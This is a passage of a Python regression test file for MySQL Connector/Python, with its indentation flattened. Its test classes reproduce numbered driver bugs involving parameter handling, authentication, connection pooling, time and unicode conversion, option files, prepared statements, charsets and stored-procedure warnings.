"""BUG#18389196: INSERTING PARAMETER MULTIPLE TIMES IN STATEMENT
"""
def setUp(self):
self.tbl = 'Bug18389196'
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS %s" % self.tbl)
create = ("CREATE TABLE %s ( "
"`id` int(11) NOT NULL, "
"`col1` varchar(20) NOT NULL, "
"`col2` varchar(20) NOT NULL, "
"PRIMARY KEY (`id`))" % self.tbl)
cur.execute(create)
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS %s" % self.tbl)
cnx.close()
@foreach_cnx()
def test_parameters(self):
self.cnx.cmd_query("TRUNCATE {0}".format(self.tbl))
cur = self.cnx.cursor()
stmt = ("INSERT INTO {0} (id,col1,col2) VALUES "
"(%(id)s,%(name)s,%(name)s)".format(
self.tbl))
try:
cur.execute(stmt, {'id': 1, 'name': 'ABC'})
except errors.ProgrammingError as err:
self.fail("Inserting parameter multiple times in a statement "
"failed: %s" % err)
cur.close()
@unittest.skipIf(tests.MYSQL_VERSION >= (5, 7, 5),
"MySQL {0} does not support old password auth".format(
tests.MYSQL_VERSION_TXT))
class BugOra18415927(tests.MySQLConnectorTests):
"""BUG#18415927: AUTH_RESPONSE VARIABLE INCREMENTED WITHOUT BEING DEFINED
"""
user = {
'username': 'nativeuser',
'password': 'nativeP@ss',
}
def setUp(self):
config = tests.get_mysql_config()
host = config['host']
database = config['database']
cnx = connection.MySQLConnection(**config)
try:
cnx.cmd_query("DROP USER '{user}'@'{host}'".format(
host=host,
user=self.user['username']))
except:
pass
create_user = "CREATE USER '{user}'@'{host}' "
cnx.cmd_query(create_user.format(user=self.user['username'],
host=host))
passwd = ("SET PASSWORD FOR '{user}'@'{host}' = "
"PASSWORD('{password}')").format(
user=self.user['username'], host=host,
password=self.user['password'])
cnx.cmd_query(passwd)
grant = "GRANT ALL ON {database}.* TO '{user}'@'{host}'"
cnx.cmd_query(grant.format(database=database,
user=self.user['username'],
host=host))
def tearDown(self):
config = tests.get_mysql_config()
host = config['host']
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP USER '{user}'@'{host}'".format(
host=host,
user=self.user['username']))
def test_auth_response(self):
config = tests.get_mysql_config()
config['unix_socket'] = None
config['user'] = self.user['username']
config['password'] = self.user['password']
config['client_flags'] = [-constants.ClientFlag.SECURE_CONNECTION,
-constants.ClientFlag.CONNECT_WITH_DB]
try:
cnx = connection.MySQLConnection(**config)
except Exception as exc:
self.fail("Connection failed: {0}".format(exc))
class BugOra18527437(tests.MySQLConnectorTests):
"""BUG#18527437: UNITTESTS FAILING WHEN --host=::1 IS PASSED AS ARGUMENT
"""
def test_poolname(self):
config = tests.get_mysql_config()
config['host'] = '::1'
config['pool_size'] = 3
exp = '{0}_{1}_{2}_{3}'.format(config['host'], config['port'],
config['user'], config['database'])
self.assertEqual(exp, pooling.generate_pool_name(**config))
def test_custom_poolname(self):
cnxpool = pooling.MySQLConnectionPool(pool_name='ham:spam',
**tests.get_mysql_config())
self.assertEqual('ham:spam', cnxpool._pool_name)
cnxpool._remove_connections()
class BugOra18694096(tests.MySQLConnectorTests):
"""
BUG#18694096: INCORRECT CONVERSION OF NEGATIVE TIMEDELTA
"""
cases = [
(timedelta(hours=0, minutes=0, seconds=1, microseconds=0),
'00:00:01',),
(timedelta(hours=0, minutes=0, seconds=-1, microseconds=0),
'-00:00:01'),
(timedelta(hours=0, minutes=1, seconds=1, microseconds=0),
'00:01:01'),
(timedelta(hours=0, minutes=-1, seconds=-1, microseconds=0),
'-00:01:01'),
(timedelta(hours=1, minutes=1, seconds=1, microseconds=0),
'01:01:01'),
(timedelta(hours=-1, minutes=-1, seconds=-1, microseconds=0),
'-01:01:01'),
(timedelta(days=3, seconds=86401),
'96:00:01'),
(timedelta(days=-3, seconds=86401),
'-47:59:59'),
]
# Cases for MySQL 5.6.4 and higher
cases_564 = [
(timedelta(hours=0, minutes=0, seconds=0, microseconds=1),
'00:00:00.000001'),
(timedelta(hours=0, minutes=0, seconds=0, microseconds=-1),
'-00:00:00.000001'),
(timedelta(days=2, hours=0, microseconds=1),
'48:00:00.000001'),
(timedelta(days=-3, seconds=86399, microseconds=999999),
'-48:00:00.000001'),
]
def setUp(self):
config = tests.get_mysql_config()
self.cnx = mysql.connector.connect(**config)
self.tbl = 'times'
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
if tests.MYSQL_VERSION >= (5, 6, 4):
create = "CREATE TABLE {0} (c1 TIME(6))".format(self.tbl)
            # Build a new list so the class-level 'cases' attribute is not
            # mutated across test runs.
            self.cases = self.cases + self.cases_564
else:
create = "CREATE TABLE {0} (c1 TIME)".format(self.tbl)
self.cnx.cmd_query(create)
def tearDown(self):
if self.cnx:
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
def test_timedelta(self):
# Note that both _timedelta_to_mysql and _TIME_to_python are
# tested
cur = self.cnx.cursor()
# Following uses _timedelta_to_mysql to insert data
data = [(case[0],) for case in self.cases]
cur.executemany("INSERT INTO {0} (c1) VALUES (%s)".format(self.tbl),
data)
self.cnx.commit()
# We use _TIME_to_python to convert back to Python
cur.execute("SELECT c1 FROM {0}".format(self.tbl))
for i, row in enumerate(cur.fetchall()):
self.assertEqual(self.cases[i][0], row[0],
"Incorrect timedelta for {0}, was {1!r}".format(
self.cases[i][1], row[0]))
class BugOra18220593(tests.MySQLConnectorTests):
"""BUG#18220593 MYSQLCURSOR.EXECUTEMANY() DOESN'T LIKE UNICODE OPERATIONS
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cur = self.cnx.cursor()
self.table = u"⽃⽄⽅⽆⽇⽈⽉⽊"
self.cur.execute(u"DROP TABLE IF EXISTS {0}".format(self.table))
self.cur.execute(u"CREATE TABLE {0} (c1 VARCHAR(100)) "
u"CHARACTER SET 'utf8'".format(self.table))
def test_unicode_operation(self):
data = [('database',), (u'データベース',), (u'데이터베이스',)]
self.cur.executemany(u"INSERT INTO {0} VALUES (%s)".format(
self.table), data)
self.cnx.commit()
self.cur.execute(u"SELECT c1 FROM {0}".format(self.table))
self.assertEqual(self.cur.fetchall(), data)
def tearDown(self):
self.cur.execute(u"DROP TABLE IF EXISTS {0}".format(self.table))
self.cur.close()
self.cnx.close()
class BugOra14843456(tests.MySQLConnectorTests):
"""BUG#14843456: UNICODE USERNAME AND/OR PASSWORD FAILS
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cursor = self.cnx.cursor()
if config['unix_socket'] and os.name != 'nt':
self.host = 'localhost'
else:
self.host = config['host']
grant = u"CREATE USER '{user}'@'{host}' IDENTIFIED BY '{password}'"
self._credentials = [
(u'Herne', u'Herne'),
(u'\u0141owicz', u'\u0141owicz'),
]
for user, password in self._credentials:
self.cursor.execute(grant.format(
user=user, host=self.host, password=password))
def tearDown(self):
for user, password in self._credentials:
self.cursor.execute(u"DROP USER '{user}'@'{host}'".format(
user=user, host=self.host))
def test_unicode_credentials(self):
config = tests.get_mysql_config()
for user, password in self._credentials:
config['user'] = user
config['password'] = password
config['database'] = None
try:
cnx = connection.MySQLConnection(**config)
except (UnicodeDecodeError, errors.InterfaceError):
self.fail('Failed using unicode username or password')
else:
cnx.close()
class Bug499410(tests.MySQLConnectorTests):
"""lp:499410 Disabling unicode does not work"""
def test_use_unicode(self):
config = tests.get_mysql_config()
config['use_unicode'] = False
cnx = connection.MySQLConnection(**config)
self.assertEqual(False, cnx._use_unicode)
cnx.close()
@cnx_config(use_unicode=False, charset='greek')
@foreach_cnx()
def test_charset(self):
charset = 'greek'
cur = self.cnx.cursor()
data = [b'\xe1\xed\xf4\xdf\xef'] # Bye in Greek
exp_unicode = [(u'\u03b1\u03bd\u03c4\u03af\u03bf',), ]
exp_nonunicode = [(data[0],)]
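        # With use_unicode=False the raw greek-encoded bytes come back as-is;
        # after set_unicode(True) the same row decodes to the unicode string.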
tbl = '{0}test'.format(charset)
try:
cur.execute("DROP TABLE IF EXISTS {0}".format(tbl))
cur.execute(
"CREATE TABLE {0} (c1 VARCHAR(60)) charset={1}".format(
tbl, charset))
except:
self.fail("Failed creating test table.")
stmt = u'INSERT INTO {0} VALUES (%s)'.format(tbl)
try:
for line in data:
cur.execute(stmt, (line,))
except Exception as exc:
self.fail("Failed populating test table: {0}".format(str(exc)))
cur.execute("SELECT * FROM {0}".format(tbl))
res_nonunicode = cur.fetchall()
self.cnx.set_unicode(True)
cur.execute("SELECT * FROM {0}".format(tbl))
res_unicode = cur.fetchall()
try:
cur.execute('DROP TABLE IF EXISTS {0}'.format(tbl))
except:
self.fail("Failed cleaning up test table.")
self.assertEqual(exp_nonunicode, res_nonunicode)
self.assertEqual(exp_unicode, res_unicode)
class BugOra18742429(tests.MySQLConnectorTests):
"""BUG#18742429: CPY FAILS WHEN QUERYING LARGE NUMBER OF COLUMNS
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
self.tbl = 'Bug18742429'
cnx.cmd_query("DROP TABLE IF EXISTS %s" % self.tbl)
create = 'CREATE TABLE {0}({1})'.format(self.tbl, ','.join(
['col'+str(i)+' INT(10)' for i in range(1000)]))
cnx.cmd_query(create)
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
cnx.close()
@foreach_cnx(connection.MySQLConnection)
def test_columns(self):
cur = self.cnx.cursor()
cur.execute('TRUNCATE TABLE {0}'.format(self.tbl))
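        # Insert a single row where even-numbered columns hold their index
        # and odd-numbered columns are NULL.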
stmt = "INSERT INTO {0} VALUES({1})".format(self.tbl, ','.join(
[str(i) if i%2==0 else 'NULL' for i in range(1000)]
))
exp = tuple(i if i%2==0 else None for i in range(1000))
cur.execute(stmt)
cur = self.cnx.cursor(prepared=True)
stmt = 'SELECT * FROM {0} WHERE col0=?'.format(self.tbl)
cur.execute(stmt, (0,))
self.assertEqual(exp, cur.fetchone())
class BugOra19164627(tests.MySQLConnectorTests):
"""BUG#19164627: Cursor tries to decode LINESTRING data as utf-8
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
self.tbl = 'BugOra19164627'
cnx.cmd_query("DROP TABLE IF EXISTS %s" % self.tbl)
cnx.cmd_query("CREATE TABLE {0} ( "
"id SERIAL PRIMARY KEY AUTO_INCREMENT NOT NULL, "
"line LINESTRING NOT NULL "
") DEFAULT CHARSET=ascii".format(self.tbl))
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
cnx.close()
@foreach_cnx()
def test_linestring(self):
cur = self.cnx.cursor()
cur.execute('TRUNCATE TABLE {0}'.format(self.tbl))
cur.execute('INSERT IGNORE INTO {0} (id, line) '
'VALUES (0,LINESTRING(POINT(0, 0), POINT(0, 1)))'.format(
self.tbl
))
cur.execute("SELECT * FROM {0} LIMIT 1".format(self.tbl))
self.assertEqual(cur.fetchone(), (1, b'\x00\x00\x00\x00\x01\x02\x00\x00'
b'\x00\x02\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\xf0?', ))
cur.close()
class BugOra19225481(tests.MySQLConnectorTests):
"""BUG#19225481: FLOATING POINT INACCURACY WITH PYTHON v2
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
self.tbl = 'Bug19225481'
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = 'CREATE TABLE {0} (col1 DOUBLE)'.format(self.tbl)
cnx.cmd_query(create)
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
cnx.close()
@foreach_cnx()
def test_columns(self):
self.cnx.cmd_query("TRUNCATE {0}".format(self.tbl))
cur = self.cnx.cursor()
values = [
(123.123456789987,),
(234.234,),
(12.12,),
(111.331,),
(0.0,),
(-99.99999900099,)
]
stmt = "INSERT INTO {0} VALUES(%s)".format(self.tbl)
cur.executemany(stmt, values)
stmt = "SELECT * FROM {0}".format(self.tbl)
cur.execute(stmt)
self.assertEqual(values, cur.fetchall())
class BugOra19169990(tests.MySQLConnectorTests):
"""BUG#19169990: Issue with compressed cnx using Python 2
"""
@cnx_config(compress=True)
@foreach_cnx()
def test_compress(self):
for charset in ('utf8', 'latin1', 'latin7'):
self.config['charset'] = charset
try:
self.cnx = self.cnx.__class__(**self.config)
cur = self.cnx.cursor()
cur.execute("SELECT %s", ('mysql'*10000,))
except TypeError:
traceback.print_exc()
self.fail("Failed setting up compressed cnx using {0}".format(
charset
))
except errors.Error:
self.fail("Failed sending/retrieving compressed data")
self.cnx.close()
class BugOra19184025(tests.MySQLConnectorTests):
"""BUG#19184025: FIRST NULL IN ROW RETURNS REST OF ROW AS NONE
"""
def setUp(self):
self.tbl = 'Bug19184025'
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = "CREATE TABLE {0} (c1 INT, c2 INT NOT NULL DEFAULT 2)".format(
self.tbl
)
cnx.cmd_query(create)
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
cnx.close()
@foreach_cnx()
def test_row_to_python(self):
self.cnx.cmd_query("TRUNCATE {0}".format(self.tbl))
cur = self.cnx.cursor()
cur.execute("INSERT INTO {0} (c1) VALUES (NULL)".format(self.tbl))
cur.execute("SELECT * FROM {0}".format(self.tbl))
self.assertEqual((None, 2), cur.fetchone())
cur.close()
class BugOra19170287(tests.MySQLConnectorTests):
"""BUG#19170287: DUPLICATE OPTION_GROUPS RAISING ERROR WITH PYTHON 3
"""
def test_duplicate_groups(self):
option_file_dir = os.path.join('tests', 'data', 'option_files')
opt_file = os.path.join(option_file_dir, 'dup_groups.cnf')
exp = {
u'password': u'mypass',
u'user': u'mysql',
u'database': u'duplicate_data',
u'port': 10000
}
self.assertEqual(exp, read_option_files(option_files=opt_file))
class BugOra19169143(tests.MySQLConnectorTests):
"""BUG#19169143: FAILURE IN RAISING ERROR WITH DUPLICATE OPTION_FILES
"""
def test_duplicate_optionfiles(self):
option_file_dir = os.path.join('tests', 'data', 'option_files')
files = [
os.path.join(option_file_dir, 'include_files', '1.cnf'),
os.path.join(option_file_dir, 'include_files', '2.cnf'),
os.path.join(option_file_dir, 'include_files', '1.cnf'),
]
self.assertRaises(ValueError, mysql.connector.connect,
option_files=files)
class BugOra19282158(tests.MySQLConnectorTests):
"""BUG#19282158: NULL values with prepared statements
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cursor = self.cnx.cursor()
self.tbl = 'Bug19282158'
self.cursor.execute("DROP TABLE IF EXISTS %s" % self.tbl)
create = ('CREATE TABLE {0}(col1 INT NOT NULL, col2 INT NULL, '
'col3 VARCHAR(10), col4 DECIMAL(4,2) NULL, '
'col5 DATETIME NULL, col6 INT NOT NULL, col7 VARCHAR(10), '
'PRIMARY KEY(col1))'.format(self.tbl))
self.cursor.execute(create)
def tearDown(self):
self.cursor.execute("DROP TABLE IF EXISTS %s" % self.tbl)
self.cursor.close()
self.cnx.close()
def test_null(self):
cur = self.cnx.cursor(prepared=True)
sql = ("INSERT INTO {0}(col1, col2, col3, col4, col5, col6, col7) "
"VALUES (?, ?, ?, ?, ?, ?, ?)".format(self.tbl))
params = (100, None, 'foo', None, datetime(2014, 8, 4, 9, 11, 14),
10, 'bar')
exp = (100, None, 'foo', None,
datetime(2014, 8, 4, 9, 11, 14), 10, 'bar')
cur.execute(sql, params)
sql = "SELECT * FROM {0}".format(self.tbl)
cur.execute(sql)
self.assertEqual(exp, cur.fetchone())
cur.close()
@unittest.skipIf(tests.MYSQL_VERSION <= (5, 7, 2),
"Pool not supported with with MySQL version 5.6")
class BugOra19168737(tests.MySQLConnectorTests):
"""BUG#19168737: UNSUPPORTED CONNECTION ARGUMENTS WHILE USING OPTION_FILES
"""
def test_unsupported_arguments(self):
option_file_dir = os.path.join('tests', 'data', 'option_files')
opt_file = os.path.join(option_file_dir, 'pool.cnf')
config = tests.get_mysql_config()
if tests.MYSQL_VERSION < (5, 7):
config["client_flags"] = [-constants.ClientFlag.CONNECT_ARGS]
conn = mysql.connector.connect(option_files=opt_file,
option_groups=['pooling'], **config)
self.assertEqual('my_pool', conn.pool_name)
mysql.connector._CONNECTION_POOLS = {}
conn.close()
new_config = read_option_files(option_files=opt_file,
option_groups=['failover'], **config)
exp = {
'failover': ({'pool_name': 'failA', 'port': 3306},
{'pool_name': 'failB', 'port': 3307})
}
exp.update(config)
self.assertEqual(exp, new_config)
class BugOra21530100(tests.MySQLConnectorTests):
"""BUG#21530100: CONNECT FAILS WHEN USING MULTIPLE OPTION_GROUPS WITH
PYTHON 3.3
"""
def test_option_files_with_option_groups(self):
temp_cnf_file = os.path.join(os.getcwd(), 'temp.cnf')
temp_include_file = os.path.join(os.getcwd(), 'include.cnf')
try:
cnf_file = open(temp_cnf_file, "w+")
include_file = open(temp_include_file, "w+")
config = tests.get_mysql_config()
cnf = "[group32]\n"
cnf += '\n'.join(['{0} = {1}'.format(key, value)
for key, value in config.items()])
cnf += "\n[group31]\n"
cnf += "!include {0}\n".format(temp_include_file)
include_cnf = "[group41]\n"
include_cnf += "charset=utf8\n"
cnf_file.write(cnf)
include_file.write(include_cnf)
cnf_file.close()
include_file.close()
            conn = mysql.connector.connect(
                option_files=temp_cnf_file,
                option_groups=['group31', 'group32', 'group41'])
except Exception as exc:
self.fail("Connection failed with option_files argument: {0}"
"".format(exc))
finally:
os.remove(temp_cnf_file)
os.remove(temp_include_file)
class BugOra19481761(tests.MySQLConnectorTests):
"""BUG#19481761: OPTION_FILES + !INCLUDE FAILS WITH TRAILING NEWLINE
"""
def test_option_files_with_include(self):
temp_cnf_file = os.path.join(os.getcwd(), 'temp.cnf')
temp_include_file = os.path.join(os.getcwd(), 'include.cnf')
cnf_file = open(temp_cnf_file, "w+")
include_file = open(temp_include_file, "w+")
config = tests.get_mysql_config()
cnf = "[connector_python]\n"
cnf += '\n'.join(['{0} = {1}'.format(key, value)
for key, value in config.items()])
include_file.write(cnf)
cnf_file.write("!include {0}\n".format(temp_include_file))
cnf_file.close()
include_file.close()
try:
conn = mysql.connector.connect(option_files=temp_cnf_file)
except:
self.fail("Connection failed with option_files argument.")
self.assertEqual(config, read_option_files(option_files=temp_cnf_file))
os.remove(temp_cnf_file)
os.remove(temp_include_file)
class BugOra19584051(tests.MySQLConnectorTests):
"""BUG#19584051: TYPE_CODE DOES NOT COMPARE EQUAL
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cursor = self.cnx.cursor()
self.tbl = 'Bug19584051'
self.cursor.execute("DROP TABLE IF EXISTS %s" % self.tbl)
create = ('CREATE TABLE {0}(col1 INT NOT NULL, col2 BLOB, '
'col3 VARCHAR(10), col4 DECIMAL(4,2), '
'col5 DATETIME , col6 YEAR, '
'PRIMARY KEY(col1))'.format(self.tbl))
self.cursor.execute(create)
def tearDown(self):
self.cursor.execute("DROP TABLE IF EXISTS %s" % self.tbl)
self.cursor.close()
self.cnx.close()
def test_dbapi(self):
cur = self.cnx.cursor()
sql = ("INSERT INTO {0}(col1, col2, col3, col4, col5, col6) "
"VALUES (%s, %s, %s, %s, %s, %s)".format(self.tbl))
params = (100, 'blob-data', 'foo', 1.2, datetime(2014, 8, 4, 9, 11, 14),
2014)
exp = [
mysql.connector.NUMBER,
mysql.connector.BINARY,
mysql.connector.STRING,
mysql.connector.NUMBER,
mysql.connector.DATETIME,
mysql.connector.NUMBER,
]
cur.execute(sql, params)
sql = "SELECT * FROM {0}".format(self.tbl)
cur.execute(sql)
temp = cur.fetchone()
type_codes = [row[1] for row in cur.description]
self.assertEqual(exp, type_codes)
cur.close()
class BugOra19522948(tests.MySQLConnectorTests):
"""BUG#19522948: DATA CORRUPTION WITH TEXT FIELDS
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cur = self.cnx.cursor()
self.tbl = 'Bug19522948'
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = "CREATE TABLE {0} (c1 LONGTEXT NOT NULL)".format(
self.tbl
)
self.cur.execute(create)
def tearDown(self):
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cur.close()
self.cnx.close()
def test_row_to_python(self):
cur = self.cnx.cursor(prepared=True)
data = "test_data"*10
cur.execute("INSERT INTO {0} (c1) VALUES (?)".format(self.tbl), (data,))
self.cur.execute("SELECT * FROM {0}".format(self.tbl))
self.assertEqual((data,), self.cur.fetchone())
self.cur.execute("TRUNCATE TABLE {0}".format(self.tbl))
data = "test_data"*1000
cur.execute("INSERT INTO {0} (c1) VALUES (?)".format(self.tbl), (data,))
self.cur.execute("SELECT * FROM {0}".format(self.tbl))
self.assertEqual((data,), self.cur.fetchone())
self.cur.execute("TRUNCATE TABLE {0}".format(self.tbl))
data = "test_data"*10000
cur.execute("INSERT INTO {0} (c1) VALUES (?)".format(self.tbl), (data,))
self.cur.execute("SELECT * FROM {0}".format(self.tbl))
self.assertEqual((data,), self.cur.fetchone())
class BugOra19500097(tests.MySQLConnectorTests):
"""BUG#19500097: BETTER SUPPORT FOR RAW/BINARY DATA
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.tbl = 'Bug19500097'
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = ("CREATE TABLE {0} (col1 VARCHAR(10), col2 INT) "
"DEFAULT CHARSET latin1".format(self.tbl))
cur.execute(create)
cur.close()
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.close()
cnx.close()
@foreach_cnx()
def test_binary_charset(self):
sql = "INSERT INTO {0} VALUES(%s, %s)".format(self.tbl)
cur = self.cnx.cursor()
cur.execute(sql, ('foo', 1))
cur.execute(sql, ('ëëë', 2))
cur.execute(sql, (u'ááá', 5))
self.cnx.set_charset_collation('binary')
cur.execute(sql, ('bar', 3))
cur.execute(sql, ('ëëë', 4))
cur.execute(sql, (u'ááá', 6))
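        # Rows inserted before the switch were converted to the latin1 column
        # charset; after set_charset_collation('binary') no conversion is done,
        # so the utf-8 encoded bytes are stored and returned unchanged.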
exp = [
(bytearray(b'foo'), 1),
(bytearray(b'\xeb\xeb\xeb'), 2),
(bytearray(b'\xe1\xe1\xe1'), 5),
(bytearray(b'bar'), 3),
(bytearray(b'\xc3\xab\xc3\xab\xc3\xab'), 4),
(bytearray(b'\xc3\xa1\xc3\xa1\xc3\xa1'), 6)
]
cur.execute("SELECT * FROM {0}".format(self.tbl))
self.assertEqual(exp, cur.fetchall())
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 3),
"MySQL {0} does not support COM_RESET_CONNECTION".format(
tests.MYSQL_VERSION_TXT))
class BugOra19549363(tests.MySQLConnectorTests):
"""BUG#19549363: Compression does not work with Change User
"""
def setUp(self):
self.config = tests.get_mysql_config()
self.config['compress'] = True
mysql.connector._CONNECTION_POOLS = {}
self.config['pool_name'] = 'mypool'
self.config['pool_size'] = 3
self.config['pool_reset_session'] = True
def tearDown(self):
# Remove pools created by test
mysql.connector._CONNECTION_POOLS = {}
def test_compress_reset_connection(self):
self.config['use_pure'] = True
cnx1 = mysql.connector.connect(**self.config)
try:
cnx1.close()
except:
self.fail("Reset session with compression test failed.")
finally:
mysql.connector._CONNECTION_POOLS = {}
@unittest.skipIf(CMySQLConnection is None, ERR_NO_CEXT)
def test_compress_reset_connection_cext(self):
self.config['use_pure'] = False
cnx1 = mysql.connector.connect(**self.config)
try:
cnx1.close()
except:
self.fail("Reset session with compression test failed.")
finally:
mysql.connector._CONNECTION_POOLS = {}
class BugOra19803702(tests.MySQLConnectorTests):
"""BUG#19803702: CAN'T REPORT ERRORS THAT HAVE NON-ASCII CHARACTERS
"""
def test_errors(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cur = self.cnx.cursor()
self.tbl = 'áááëëëááá'
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = ("CREATE TABLE {0} (col1 VARCHAR(10), col2 INT) "
"DEFAULT CHARSET latin1".format(self.tbl))
self.cur.execute(create)
self.assertRaises(errors.DatabaseError, self.cur.execute, create)
def tearDown(self):
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cur.close()
self.cnx.close()
class BugOra19777815(tests.MySQLConnectorTests):
"""BUG#19777815: CALLPROC() DOES NOT SUPPORT WARNINGS
"""
def setUp(self):
config = tests.get_mysql_config()
config['get_warnings'] = True
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.sp1 = 'BUG19777815'
self.sp2 = 'BUG19777815_with_result'
create1 = (
"CREATE PROCEDURE {0}() BEGIN SIGNAL SQLSTATE '01000' "
"SET MESSAGE_TEXT = 'TEST WARNING'; END;".format(self.sp1)
)
create2 = (
"CREATE PROCEDURE {0}() BEGIN SELECT 1; SIGNAL SQLSTATE '01000' "
"SET MESSAGE_TEXT = 'TEST WARNING'; END;".format(self.sp2)
)
cur.execute("DROP PROCEDURE IF EXISTS {0}".format(self.sp1))
cur.execute("DROP PROCEDURE IF EXISTS {0}".format(self.sp2))
cur.execute(create1)
cur.execute(create2)
cur.close()
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP PROCEDURE IF EXISTS {0}".format(self.sp1))
cur.execute("DROP PROCEDURE IF EXISTS {0}".format(self.sp2))
cur.close()
cnx.close()
@foreach_cnx(get_warnings=True)
def test_warning(self):
cur = self.cnx.cursor()
cur.callproc(self.sp1)
exp = [(u'Warning', 1642, u'TEST WARNING')]
self.assertEqual(exp, cur.fetchwarnings())
@foreach_cnx(get_warnings=True)
def test_warning_with_rows(self):
cur = self.cnx.cursor()
cur.callproc(self.sp2)
exp = [(1,)]
if PY2:
self.assertEqual(exp, cur.stored_results().next().fetchall())
else:
self.assertEqual(exp, next(cur.stored_results()).fetchall())
exp = [(u'Warning', 1642, u'TEST WARNING')]
self.assertEqual(exp, cur.fetchwarnings())
class BugOra20407036(tests.MySQLConnectorTests):
"""BUG#20407036: INCORRECT ARGUMENTS TO MYSQLD_STMT_EXECUTE ERROR
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cur = self.cnx.cursor()
self.tbl = 'Bug20407036'
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = ("CREATE TABLE {0} ( id int(10) unsigned NOT NULL, "
"text VARCHAR(70000) CHARACTER SET utf8 NOT NULL, "
"rooms tinyint(3) unsigned NOT NULL) "
"ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8 "
"COLLATE=utf8_unicode_ci".format(self.tbl))
self.cur.execute(create)
def tearDown(self):
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cur.close()
self.cnx.close()
def test_binary_charset(self):
cur = self.cnx.cursor(prepared=True)
sql = "INSERT INTO {0}(text, rooms) VALUES(%s, %s)".format(self.tbl)
cur.execute(sql, ('a'*252, 1))
cur.execute(sql, ('a'*253, 2))
cur.execute(sql, ('a'*255, 3))
cur.execute(sql, ('a'*251, 4))
cur.execute(sql, ('a'*65535, 5))
exp = [
(0, 'a'*252, 1),
(0, 'a'*253, 2),
(0, 'a'*255, 3),
(0, 'a'*251, 4),
(0, 'a'*65535, 5),
]
self.cur.execute("SELECT * FROM {0}".format(self.tbl))
self.assertEqual(exp, self.cur.fetchall())
class BugOra20301989(tests.MySQLConnectorTests):
"""BUG#20301989: SET DATA TYPE NOT TRANSLATED CORRECTLY WHEN EMPTY
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.tbl = 'Bug20301989'
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = ("CREATE TABLE {0} (col1 SET('val1', 'val2')) "
"DEFAULT CHARSET latin1".format(self.tbl))
cur.execute(create)
cur.close()
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.close()
cnx.close()
@foreach_cnx()
def test_set(self):
cur = self.cnx.cursor()
sql = "INSERT INTO {0} VALUES(%s)".format(self.tbl)
cur.execute(sql, ('val1,val2',))
cur.execute(sql, ('val1',))
cur.execute(sql, ('',))
cur.execute(sql, (None,))
exp = [
(set([u'val1', u'val2']),),
(set([u'val1']),),
(set([]),),
(None,)
]
cur.execute("SELECT * FROM {0}".format(self.tbl))
self.assertEqual(exp, cur.fetchall())
class BugOra20462427(tests.MySQLConnectorTests):
"""BUG#20462427: BYTEARRAY INDEX OUT OF RANGE
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.tbl = 'BugOra20462427'
